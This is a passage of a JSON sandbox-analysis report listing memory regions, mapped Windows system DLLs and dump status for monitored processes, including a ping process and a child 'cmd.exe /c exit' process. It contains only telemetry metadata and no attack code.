"ref_process_dump": null, "size": 1294336, "start_va": 1999241216, "type": "region", "version": 1 }, "end_va": 2000535551, "entry_point": 1999241216, "filename": "\\Windows\\System32\\ntdll.dll", "id": "region_1475", "name": "ntdll.dll", "norm_filename": "c:\\windows\\system32\\ntdll.dll", "region_type": "memory_mapped_file", "start_va": 1999241216, "timestamp": "00:00:51.274", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 4096, "start_va": 2001600512, "type": "region", "version": 1 }, "end_va": 2001604607, "entry_point": 2001600512, "filename": "\\Windows\\System32\\apisetschema.dll", "id": "region_1476", "name": "apisetschema.dll", "norm_filename": "c:\\windows\\system32\\apisetschema.dll", "region_type": "memory_mapped_file", "start_va": 2001600512, "timestamp": "00:00:51.275", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 143360, "start_va": 2147155968, "type": "region", "version": 1 }, "end_va": 2147299327, "entry_point": 0, "filename": null, "id": "region_1477", "name": "pagefile_0x000000007ffb0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 2147155968, "timestamp": "00:00:51.277", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000025-region_00001478-addr_0x000000007ffd5000-size_0x0000000000001000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_303", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 2147307520, "type": "region", "version": 1 }, "end_va": 2147311615, "entry_point": 0, "filename": null, "id": "region_1478", "name": "private_0x000000007ffd5000", "norm_filename": null, "region_type": "private_memory", "start_va": 2147307520, "timestamp": "00:00:51.277", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000025-region_00001479-addr_0x000000007ffdf000-size_0x0000000000001000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_304", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 2147348480, "type": "region", "version": 1 }, "end_va": 2147352575, "entry_point": 0, "filename": null, "id": "region_1479", "name": "private_0x000000007ffdf000", "norm_filename": null, "region_type": "private_memory", "start_va": 2147348480, "timestamp": "00:00:51.278", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 65536, "type": "region", "version": 1 }, "end_va": 131071, "entry_point": 0, "filename": null, "id": "region_1480", "name": "pagefile_0x0000000000010000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 65536, "timestamp": "00:00:51.292", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 131072, "type": "region", "version": 1 }, "end_va": 196607, "entry_point": 0, "filename": null, "id": "region_1481", "name": "pagefile_0x0000000000020000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 131072, "timestamp": "00:00:51.292", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 421888, "start_va": 327680, "type": "region", "version": 1 }, "end_va": 749567, "entry_point": 327680, "filename": "\\Windows\\System32\\locale.nls", "id": "region_1482", "name": "locale.nls", "norm_filename": "c:\\windows\\system32\\locale.nls", "region_type": "memory_mapped_file", "start_va": 327680, "timestamp": "00:00:51.292", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000025-region_00001483-addr_0x0000000000300000-size_0x0000000000100000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_305", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 1048576, "start_va": 3145728, "type": "region", "version": 1 }, "end_va": 4194303, "entry_point": 0, "filename": null, "id": "region_1483", "name": "private_0x0000000000300000", "norm_filename": null, "region_type": "private_memory", "start_va": 3145728, "timestamp": "00:00:51.293", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000025-region_00001484-addr_0x00000000005b0000-size_0x0000000000010000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_306", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 65536, "start_va": 5963776, "type": "region", "version": 1 }, "end_va": 6029311, "entry_point": 0, "filename": null, "id": "region_1484", "name": "private_0x00000000005b0000", "norm_filename": null, "region_type": "private_memory", "start_va": 5963776, "timestamp": "00:00:51.293", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 28672, "start_va": 1947074560, "type": "region", "version": 1 }, "end_va": 1947103231, "entry_point": 1947079309, "filename": "\\Windows\\System32\\winnsi.dll", "id": "region_1485", "name": "winnsi.dll", "norm_filename": "c:\\windows\\system32\\winnsi.dll", "region_type": "memory_mapped_file", "start_va": 1947074560, "timestamp": "00:00:51.293", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 114688, "start_va": 1947140096, "type": "region", "version": 1 }, "end_va": 1947254783, "entry_point": 1947182129, "filename": "\\Windows\\System32\\IPHLPAPI.DLL", "id": "region_1486", "name": "iphlpapi.dll", "norm_filename": "c:\\windows\\system32\\iphlpapi.dll", "region_type": "memory_mapped_file", "start_va": 1947140096, "timestamp": "00:00:51.293", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 303104, "start_va": 1967587328, "type": "region", "version": 1 }, "end_va": 1967890431, "entry_point": 1967619552, "filename": "\\Windows\\System32\\KernelBase.dll", "id": "region_1487", "name": "kernelbase.dll", "norm_filename": "c:\\windows\\system32\\kernelbase.dll", "region_type": "memory_mapped_file", "start_va": 1967587328, "timestamp": "00:00:51.294", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 102400, "start_va": 1970208768, "type": "region", "version": 1 }, "end_va": 1970311167, "entry_point": 1970227573, "filename": "\\Windows\\System32\\sechost.dll", "id": "region_1488", "name": "sechost.dll", "norm_filename": "c:\\windows\\system32\\sechost.dll", "region_type": "memory_mapped_file", "start_va": 1970208768, "timestamp": "00:00:51.294", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 659456, "start_va": 1970339840, "type": "region", "version": 1 }, "end_va": 1970999295, "entry_point": 1970545715, "filename": "\\Windows\\System32\\rpcrt4.dll", "id": "region_1489", "name": "rpcrt4.dll", "norm_filename": "c:\\windows\\system32\\rpcrt4.dll", "region_type": "memory_mapped_file", "start_va": 1970339840, "timestamp": "00:00:51.295", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 655360, "start_va": 1984888832, "type": "region", "version": 1 }, "end_va": 1985544191, "entry_point": 1984973285, "filename": "\\Windows\\System32\\advapi32.dll", "id": "region_1490", "name": "advapi32.dll", "norm_filename": "c:\\windows\\system32\\advapi32.dll", "region_type": "memory_mapped_file", "start_va": 1984888832, "timestamp": "00:00:51.295", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 868352, "start_va": 1985544192, "type": "region", "version": 1 }, "end_va": 1986412543, "entry_point": 1985854948, "filename": "\\Windows\\System32\\kernel32.dll", "id": "region_1491", "name": "kernel32.dll", "norm_filename": "c:\\windows\\system32\\kernel32.dll", "region_type": "memory_mapped_file", "start_va": 1985544192, "timestamp": "00:00:51.296", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 704512, "start_va": 1987575808, "type": "region", "version": 1 }, "end_va": 1988280319, "entry_point": 1987617906, "filename": "\\Windows\\System32\\msvcrt.dll", "id": "region_1492", "name": "msvcrt.dll", "norm_filename": "c:\\windows\\system32\\msvcrt.dll", "region_type": "memory_mapped_file", "start_va": 1987575808, "timestamp": "00:00:51.296", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 40960, "start_va": 1988296704, "type": "region", "version": 1 }, "end_va": 1988337663, "entry_point": 1988301676, "filename": "\\Windows\\System32\\lpk.dll", "id": "region_1493", "name": "lpk.dll", "norm_filename": "c:\\windows\\system32\\lpk.dll", "region_type": "memory_mapped_file", "start_va": 1988296704, "timestamp": "00:00:51.297", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 319488, "start_va": 1988362240, "type": "region", "version": 1 }, "end_va": 1988681727, "entry_point": 1988402185, "filename": "\\Windows\\System32\\gdi32.dll", "id": "region_1494", "name": "gdi32.dll", "norm_filename": "c:\\windows\\system32\\gdi32.dll", "region_type": "memory_mapped_file", "start_va": 1988362240, "timestamp": "00:00:51.297", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 823296, "start_va": 1988689920, "type": "region", "version": 1 }, "end_va": 1989513215, "entry_point": 1988810513, "filename": "\\Windows\\System32\\user32.dll", "id": "region_1495", "name": "user32.dll", "norm_filename": "c:\\windows\\system32\\user32.dll", "region_type": "memory_mapped_file", "start_va": 1988689920, "timestamp": "00:00:51.298", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 217088, "start_va": 1989541888, "type": "region", "version": 1 }, "end_va": 1989758975, "entry_point": 1989547101, "filename": "\\Windows\\System32\\ws2_32.dll", "id": "region_1496", "name": "ws2_32.dll", "norm_filename": "c:\\windows\\system32\\ws2_32.dll", "region_type": "memory_mapped_file", "start_va": 1989541888, "timestamp": "00:00:51.298", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 643072, "start_va": 1994784768, "type": "region", "version": 1 }, "end_va": 1995427839, "entry_point": 1994997719, "filename": "\\Windows\\System32\\usp10.dll", "id": "region_1497", "name": "usp10.dll", "norm_filename": "c:\\windows\\system32\\usp10.dll", "region_type": "memory_mapped_file", "start_va": 1994784768, "timestamp": "00:00:51.298", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 24576, "start_va": 2000551936, "type": "region", "version": 1 }, "end_va": 2000576511, "entry_point": 2000557954, "filename": "\\Windows\\System32\\nsi.dll", "id": "region_1498", "name": "nsi.dll", "norm_filename": "c:\\windows\\system32\\nsi.dll", "region_type": "memory_mapped_file", "start_va": 2000551936, "timestamp": "00:00:51.299", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 1048576, "start_va": 2137980928, "type": "region", "version": 1 }, "end_va": 2139029503, "entry_point": 0, "filename": null, "id": "region_1499", "name": "pagefile_0x000000007f6f0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 2137980928, "timestamp": "00:00:51.299", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 819200, "start_va": 786432, "type": "region", "version": 1 }, "end_va": 1605631, "entry_point": 0, "filename": null, "id": "region_1500", "name": "pagefile_0x00000000000c0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 786432, "timestamp": "00:00:51.303", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 835584, "start_va": 1971060736, "type": "region", "version": 1 }, "end_va": 1971896319, "entry_point": 1971066507, "filename": "\\Windows\\System32\\msctf.dll", "id": "region_1501", "name": "msctf.dll", "norm_filename": "c:\\windows\\system32\\msctf.dll", "region_type": "memory_mapped_file", "start_va": 1971060736, "timestamp": "00:00:51.303", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 126976, "start_va": 2000683008, "type": "region", "version": 1 }, "end_va": 2000809983, "entry_point": 2000687957, "filename": "\\Windows\\System32\\imm32.dll", "id": "region_1502", "name": "imm32.dll", "norm_filename": "c:\\windows\\system32\\imm32.dll", "region_type": "memory_mapped_file", "start_va": 2000683008, "timestamp": "00:00:51.303", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 28672, "start_va": 1638400, "type": "region", "version": 1 }, "end_va": 1667071, "entry_point": 0, "filename": null, "id": "region_1503", "name": "pagefile_0x0000000000190000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 1638400, "timestamp": "00:00:51.313", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 8192, "start_va": 1703936, "type": "region", "version": 1 }, "end_va": 1712127, "entry_point": 0, "filename": null, "id": "region_1504", "name": "pagefile_0x00000000001a0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 1703936, "timestamp": "00:00:51.313", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 1052672, "start_va": 2031616, "type": "region", "version": 1 }, "end_va": 3084287, "entry_point": 0, "filename": null, "id": "region_1505", "name": "pagefile_0x00000000001f0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 2031616, "timestamp": "00:00:51.313", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 12288, "start_va": 4194304, "type": "region", "version": 1 }, "end_va": 4206591, "entry_point": 4194304, "filename": "\\Windows\\System32\\en-US\\ping.exe.mui", "id": "region_1506", "name": "ping.exe.mui", "norm_filename": "c:\\windows\\system32\\en-us\\ping.exe.mui", "region_type": "memory_mapped_file", "start_va": 4194304, "timestamp": "00:00:51.314", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000025-region_00001507-addr_0x0000000000410000-size_0x0000000000001000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_307", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 4259840, "type": "region", "version": 1 }, "end_va": 4263935, "entry_point": 0, "filename": null, "id": "region_1507", "name": "private_0x0000000000410000", "norm_filename": null, "region_type": "private_memory", "start_va": 4259840, "timestamp": "00:00:51.320", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000025-region_00001508-addr_0x0000000000420000-size_0x0000000000001000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_308", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 4325376, "type": "region", "version": 1 }, "end_va": 4329471, "entry_point": 0, "filename": null, "id": "region_1508", "name": "private_0x0000000000420000", "norm_filename": null, "region_type": "private_memory", "start_va": 4325376, "timestamp": "00:00:51.320", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "region_too_big" ], "info": "No dump was created because region size surpasses maximum region dump size of the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 12582912, "start_va": 15990784, "type": "region", "version": 1 }, "end_va": 28573695, "entry_point": 0, "filename": null, "id": "region_1509", "name": "pagefile_0x0000000000f40000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 15990784, "timestamp": "00:00:51.321", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 2945024, "start_va": 6029312, "type": "region", "version": 1 }, "end_va": 8974335, "entry_point": 6029312, "filename": "\\Windows\\Globalization\\Sorting\\SortDefault.nls", "id": "region_1510", "name": "sortdefault.nls", "norm_filename": "c:\\windows\\globalization\\sorting\\sortdefault.nls", "region_type": "memory_mapped_file", "start_va": 6029312, "timestamp": "00:00:51.322", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000025-region_00001511-addr_0x00000000008e0000-size_0x0000000000040000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_309", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 262144, "start_va": 9306112, "type": "region", "version": 1 }, "end_va": 9568255, "entry_point": 0, "filename": null, "id": "region_1511", "name": "private_0x00000000008e0000", "norm_filename": null, "region_type": "private_memory", "start_va": 9306112, "timestamp": "00:00:51.329", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000025-region_00001512-addr_0x000000007ffde000-size_0x0000000000001000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_310", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 2147344384, "type": "region", "version": 1 }, "end_va": 2147348479, "entry_point": 0, "filename": null, "id": "region_1512", "name": "private_0x000000007ffde000", "norm_filename": null, "region_type": "private_memory", "start_va": 2147344384, "timestamp": "00:00:51.329", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000025-region_00001513-addr_0x0000000000490000-size_0x0000000000040000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_311", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 262144, "start_va": 4784128, "type": "region", "version": 1 }, "end_va": 5046271, "entry_point": 0, "filename": null, "id": "region_1513", "name": "private_0x0000000000490000", "norm_filename": null, "region_type": "private_memory", "start_va": 4784128, "timestamp": "00:00:51.334", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000025-region_00001514-addr_0x0000000000950000-size_0x0000000000040000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_312", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 262144, "start_va": 9764864, "type": "region", "version": 1 }, "end_va": 10027007, "entry_point": 0, "filename": null, "id": "region_1514", "name": "private_0x0000000000950000", "norm_filename": null, "region_type": "private_memory", "start_va": 9764864, "timestamp": "00:00:51.334", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000025-region_00001515-addr_0x000000007ffdc000-size_0x0000000000001000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_313", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 2147336192, "type": "region", "version": 1 }, "end_va": 2147340287, "entry_point": 0, "filename": null, "id": "region_1515", "name": "private_0x000000007ffdc000", "norm_filename": null, "region_type": "private_memory", "start_va": 2147336192, "timestamp": "00:00:51.334", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000025-region_00001516-addr_0x000000007ffdd000-size_0x0000000000001000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_314", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 2147340288, "type": "region", "version": 1 }, "end_va": 2147344383, "entry_point": 0, "filename": null, "id": "region_1516", "name": "private_0x000000007ffdd000", "norm_filename": null, "region_type": "private_memory", "start_va": 2147340288, "timestamp": "00:00:51.335", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 245760, "start_va": 1961033728, "type": "region", "version": 1 }, "end_va": 1961279487, "entry_point": 1961038941, "filename": "\\Windows\\System32\\mswsock.dll", "id": "region_1517", "name": "mswsock.dll", "norm_filename": "c:\\windows\\system32\\mswsock.dll", "region_type": "memory_mapped_file", "start_va": 1961033728, "timestamp": "00:00:51.335", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000025-region_00001518-addr_0x0000000000990000-size_0x0000000000120000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_315", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 1179648, "start_va": 10027008, "type": "region", "version": 1 }, "end_va": 11206655, "entry_point": 0, "filename": null, "id": "region_1518", "name": "private_0x0000000000990000", "norm_filename": null, "region_type": "private_memory", "start_va": 10027008, "timestamp": "00:00:51.337", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 24576, "start_va": 1911685120, "type": "region", "version": 1 }, "end_va": 1911709695, "entry_point": 1911685120, "filename": "\\Windows\\System32\\wshqos.dll", "id": "region_1519", "name": "wshqos.dll", "norm_filename": "c:\\windows\\system32\\wshqos.dll", "region_type": "memory_mapped_file", "start_va": 1911685120, "timestamp": "00:00:51.338", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 20480, "start_va": 1956446208, "type": "region", "version": 1 }, "end_va": 1956466687, "entry_point": 1956451807, "filename": "\\Windows\\System32\\WSHTCPIP.DLL", "id": "region_1520", "name": "wshtcpip.dll", "norm_filename": "c:\\windows\\system32\\wshtcpip.dll", "region_type": "memory_mapped_file", "start_va": 1956446208, "timestamp": "00:00:51.348", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 24576, "start_va": 1965490176, "type": "region", "version": 1 }, "end_va": 1965514751, "entry_point": 1965495923, "filename": "\\Windows\\System32\\wship6.dll", "id": "region_1521", "name": "wship6.dll", "norm_filename": "c:\\windows\\system32\\wship6.dll", "region_type": "memory_mapped_file", "start_va": 1965490176, "timestamp": "00:00:51.349", "type": "region", "version": 1 } ], "terminate_reason": "terminated", "type": "monitored_process", "unmonitor_reason": "terminated_by_timeout", "version": 1 }, { "cmd_line": "cmd.exe /c exit", "filename": "c:\\windows\\system32\\cmd.exe", "id": "proc_26", "image_name": "cmd.exe", "monitor_reason": "child_process", "monitored_id": 26, "origin_monitor_id": 23, "ref_parent_process": { "ref_id": "proc_23", "ref_source": "summary", "ref_type": "monitored_process", "type": "reference", "version": 1 }, "regions": [ { "dump": { "filename": "process_00000026-region_00001522-addr_0x0000000000010000-size_0x0000000000020000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_316", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 131072, "start_va": 65536, "type": "region", "version": 1 }, "end_va": 196607, "entry_point": 0, "filename": null, "id": "region_1522", "name": "private_0x0000000000010000", "norm_filename": null, "region_type": "private_memory", "start_va": 65536, "timestamp": "00:00:53.421", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 16384, "start_va": 196608, "type": "region", "version": 1 }, "end_va": 212991, "entry_point": 0, "filename": null, "id": "region_1523", "name": "pagefile_0x0000000000030000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 196608, "timestamp": "00:00:53.421", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4096, "start_va": 262144, "type": "region", "version": 1 }, "end_va": 266239, "entry_point": 0, "filename": null, "id": "region_1524", "name": "pagefile_0x0000000000040000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 262144, "timestamp": "00:00:53.421", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000026-region_00001525-addr_0x00000000000f0000-size_0x0000000000100000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_317", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 1048576, "start_va": 983040, "type": "region", "version": 1 }, "end_va": 2031615, "entry_point": 0, "filename": null, "id": "region_1525", "name": "private_0x00000000000f0000", "norm_filename": null, "region_type": "private_memory", "start_va": 983040, "timestamp": "00:00:53.421", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 311296, "start_va": 1239744512, "type": "region", "version": 1 }, "end_va": 1240055807, "entry_point": 1239777946, "filename": "\\Windows\\System32\\cmd.exe", "id": "region_1526", "name": "cmd.exe", "norm_filename": "c:\\windows\\system32\\cmd.exe", "region_type": "memory_mapped_file", "start_va": 1239744512, "timestamp": "00:00:53.421", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1294336, "start_va": 1999241216, "type": "region", "version": 1 }, "end_va": 2000535551, "entry_point": 1999241216, "filename": "\\Windows\\System32\\ntdll.dll", "id": "region_1527", "name": "ntdll.dll", "norm_filename": "c:\\windows\\system32\\ntdll.dll", "region_type": "memory_mapped_file", "start_va": 1999241216, "timestamp": "00:00:53.422", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 4096, "start_va": 2001600512, "type": "region", "version": 1 }, "end_va": 2001604607, "entry_point": 2001600512, "filename": "\\Windows\\System32\\apisetschema.dll", "id": "region_1528", "name": "apisetschema.dll", "norm_filename": "c:\\windows\\system32\\apisetschema.dll", "region_type": "memory_mapped_file", "start_va": 2001600512, "timestamp": "00:00:53.423", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 143360, "start_va": 2147155968, "type": "region", "version": 1 }, "end_va": 2147299327, "entry_point": 0, "filename": null, "id": "region_1529", "name": "pagefile_0x000000007ffb0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 2147155968, "timestamp": "00:00:53.428", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000026-region_00001530-addr_0x000000007ffde000-size_0x0000000000001000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_318", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 2147344384, "type": "region", "version": 1 }, "end_va": 2147348479, "entry_point": 0, "filename": null, "id": "region_1530", "name": "private_0x000000007ffde000", "norm_filename": null, "region_type": "private_memory", "start_va": 2147344384, 